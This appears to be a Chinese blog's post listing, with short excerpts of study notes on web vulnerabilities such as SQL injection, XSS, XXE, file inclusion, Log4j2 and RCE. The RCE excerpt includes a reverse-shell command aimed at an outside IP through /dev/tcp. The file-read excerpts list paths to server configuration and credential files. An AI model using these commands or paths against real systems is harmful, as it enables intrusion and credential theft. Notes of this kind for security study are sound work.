自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(18)
  • 收藏
  • 关注

原创 序列化与反序列化

相关介绍**目的:方便传输和存储数据**序列化:把一个对象转变为可以传输的字符串**反序列化:**把字符还原为对象 unserialize()**new:**将一个类实例化**var:**声明类的属性:::info序列化结果为::::::warning● a – array 数组● b – boolean 布尔型● i – integer 整型● o – common object 一般对象● s – string 字符串。

2025-08-24 21:17:21 351

原创 同源策略相关

CSRF(跨站请求伪造)是⼀种攻击方式,利⽤⽤户的身份认证信息在未授权的情况下发起请求,攻击者诱导用户执行不当操作, 通常通过伪造表单或链接实现。网站A收到请求后,以JSON格式生成请求需要的数据(用户信息)将数据作为回调函数的参数返回给浏览器。端⼝:两者使⽤的端⼝号必须相同,默认情况下HTTP使⽤80端⼝,HTTPS使⽤443端⼝。浏览器出于安全考虑,默认只允许同源的请求,以防⽌恶意⽹站窃取⽤户数据。这⼀策略有效地保护了⽤户的隐私和安全,但也限制了某些合法的跨域请求,因此引⼊了。

2025-08-24 21:15:34 277

原创 前后端重点

拼接查询结果显示 |} catch { 捕获异常 }| ascii()/ord() | select ascii(mid(user(),1)) | 将结果转换为ascii码 |

2025-08-24 21:14:16 250

原创 JWT漏洞

还有就是CSRF(跨站伪造请求攻击)攻击,session是基于cookie进行用户识别的, cookie如果被截获,用户就会很容易受到跨站请求伪造的攻击。认证的记录被保存在内存中的话,这意味着用户下次请求还必须要请求在这台服务器上,这样才能拿到授权的资源,这样在分布式的应用上,相应的限制了负载均衡器的能力。这也意味着限制了应用的扩展能力。1. 用户经过应用认证之后,应用都要在服务端做一次记录,以方便用户下次请求的鉴别,通常而言session都是保存在内存中,而随着认证用户的增多,服务端的开销会明显增大。

2025-08-24 21:13:23 251

原创 Apache Log4j2

Log4j2:Apache Log4j2是一款Java**日志框架**,Java的日志记录工具,用来**记录和处理日志信息**。JNDIJava提供的一个目录服务应用程序接口(API),它提供一个目录系统,将服务名称与对象关联起来,从而使得开发人员在开发过程中可以使用名称来访问对象。LDAP和RMI:LDAP(轻量级目录访问协议) 是由目录数据库和一套访问协议组成的系统。RMI(远程方法调用)该协议用于远程调用应用程序编程接口,使客户机上运行的程序可以调用远程服务器上的对象。

2025-08-24 21:12:48 584

原创 RCE命令执行与代码执行

版本中存在这种漏洞,由于底层没有对控制器名进行很好的合法性校验,导致在未开启强制路由的情况下,用户可以调用任意类的任意方法,最终导致远程代码执行漏洞的产生。第二步:受害者执行反弹shell命令 sh -i /dev/tcp/113.44.50.32/4444 1&<0 //-i是产生交互式的shell。命令执行漏洞是执行的系统命令;程序因为设计需求需要调用**执行代码的函数**,函数的参数使用户可控的,导致RCE。执行系统命令的时候,如果将前端用户的输入数据作为系统命令的参数拼接到函数中,如果。

2025-06-06 16:10:49 596

原创 任意文件读取_下载漏洞

usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置。/usr/local/app/apache2/conf/httpd.conf //apache2默认配置文件。/usr/local/app/php5/lib/php.ini //php相关设置。/etc/httpd/conf/httpd.conf //Apache配置文件。/etc/httpd/conf/httpd.conf //apache配置文件。

2025-06-06 16:10:12 477

原创 任意文件读取_下载漏洞

usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置。/usr/local/app/apache2/conf/httpd.conf //apache2默认配置文件。/usr/local/app/php5/lib/php.ini //php相关设置。/etc/httpd/conf/httpd.conf //Apache配置文件。/etc/httpd/conf/httpd.conf //apache配置文件。

2025-06-06 16:08:27 1635

原创 文件包含漏洞

程序在使用文件包含函数的时候,用户对文件包含函数得参数(被包含得文件)是可控得,那么攻击者就可以传入恶意文件,从而获取敏感信息甚至服务器权限。C:/Program Files/mysql/data/mysql/user.MYD - //Mysql 表的内容信息。操作系统存在最大路径长度的限制。C:/Windows/repairsam - //存储系统初次安装的密码。php://input 写入恶意脚本,条件:php版本>5.2,**data:// 写入恶意脚本,条件:php版本>5.2.0,**

2025-06-06 16:07:42 1615

原创 XXE外部实体注入

*用来****存储和传输数据****的语言,经常用作系统的****配置文件****,或者作为一种特殊的数据结构在网络中进行传输**1.XML是⼀种标记语⾔,很类似于HTML语⾔2.XML中的"<标签名>"成为⼀个标签或者⼀个元素,⼀般是成对出现的。3.XML中的标签名是可以⾃定义的(可拓展)4.XML中只能有⼀个根标签、XML中的标签可以有属性5.XML的设计是为了传输、存储数据,⽽⾮显⽰数据6.XML⽂件后缀为.xml⽂件(现在xml用到比较少了,大多用 .

2025-05-12 17:49:58 1785

原创 XSS和CSRF和SSRF

原理:Web应用程序对用户输入的内容和程序输出的内容没有经过严格的校验和过滤, 导致攻击者构造恶意的代码被带入,又被程序当作正常的代码输出至前端页面,浏览器解析执行后从而产生危害。成因:攻击者利用浏览器执行前端代码(HTML、CSS、JS)的特性,将恶意 JS代码插入到Web页面中,当普通用户访问到该页面时这些代码就会被执行,从而到达攻击者的攻击目的。危害:① 网络钓鱼,盗取各种用户账户。② 窃取用户的cookies资料,从而获取用户隐私信息。③ 弹出广告页面,获取相关利益。

2025-05-12 17:49:09 746

原创 sql注入

本文主要介绍了SQL注入的相关知识,包括其原理、条件、危害、类型及流程。SQL注入是由于目标站点未对用户提交的表单或参数进行严格过滤,导致恶意SQL语句被执行,进而获取数据库信息或权限。其危害包括数据库信息泄露、写入webshell、网站篡改、获取系统权限等。SQL注入类型分为数字型、字符型、搜索型,注入方式包括联合查询、报错注入、布尔盲注、时间盲注等。文章还详细介绍了SQL注入的流程,如判断数据库类型、确定回显点、查询数据库信息等,并提供了常用函数和报错注入的示例。

2025-05-12 17:47:40 712

原创 渗透测试&信息收集

通过模拟真实黑客攻击手段来对目标系统进行一系列的评估。(模拟黑客对目标系统进行安全检测)CDN的全称是:内容分发网络,基本的作用就是通过在网络各处放置节点服务器所构成基于互联网之上的只能虚拟网络,CDN的核心就是使用户可就近访问网络,取得所需内容,解决网络拥挤的状况,提供用户访问以及下载速度。一般来说如果网站开启了CDN服务,会根据用户所在地不同访问不同的CDN的节点服务器,并不直接访问源服务器。这样可以有效防止渗透测试以及DDOS、CC攻击,也是一种防护方式。但是对我们测试人员来说就很不友好。

2025-05-05 14:20:03 376

原创 HTML,JS,分支和循环语句

1.JavaScript 是一种轻量级的编程语言。2.JavaScript 是可插入 HTML 页面的编程代码。3.JavaScript 插入 HTML 页面后,可由所有的现代浏览器执行。我们学习JavaScript主要用于处理网页中的前端验证,如:用户名的长度、密码长度、邮件格式、以及数据在传递给后端时的加密方式。

2025-05-05 14:18:59 478

原创 JavaScript DOM

HTML DOM(文档对象模型)通过 HTML DOM,JavaScript 能够访问和处理改变 HTML 文档(页面)的所有元素。HTML DOM文档对象是你的网页中所有其他对象的拥有者。HTML DOM Document 对象文档对象代表您的网页。如果要访问 HTML 页面中的任何元素,那么要从访问 document 对象开始。查找html元素!

2025-05-05 14:18:21 342

原创 MYSQL

create table +表名(字段 类型 约束,字段 类型 约束,primary key(某字段));| mysql -u root -p | 连接MySQL,-u执行我们要连接的用户名,-p用户的密码 |update +表名 set +字段1=值1,字段2=值2 where id=x;insert into +表名(字段1,字段3)values(1,'abc');| select +字段 from +表名 | 查询某个字段在某个表中 || 查看表结构(字段,类型,主键等信息) |

2025-05-05 14:17:43 364

原创 PHP基础

PHP是Hypertext Preprocessor的缩写,(超文本预处理器)是一种在服务器端运行的开源的脚本语言。该语言 让 WEB 开发人员快速书写动态生成的网页。静态网页:展示数据 动态网页具有像:登录、注册、搜索、查询功能的站点。PHP是服务器端**(后端)语言**。前端语言:html css js (主要是做数据展示、美化、校验)后端语言:后端业务逻辑处理(登录逻辑、搜索逻辑、增删改查)php作用:操作文件 、收集前端页面提交数据 、对数据库进行增删改查操作。

2025-05-05 14:16:39 346

原创 PHP语法

在函数内部的变量叫局部变量,在函数外也无法使用。要想解决上述两种情况只需。+ 在任何作用域(全局、函数、类方法)中**自动可用**,无需特别声明。:系统会⾃动判断⽂件包含过程中,如果该⽂件中已经被包含过,则不会再次包含。$_FILES( 处理通过 HTTP POST 上传的文件 )、$_COOKIE( 获取客户端浏览器发送的 Cookie )、$_SESSION( 在服务器端存储用户会话信息 ):⽣成⼀个致命错误,在错误发⽣后脚本会。: ⽣成⼀个告警,在错误发⽣后脚本会。`** 的数据 )**

2025-05-05 14:14:01 335

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除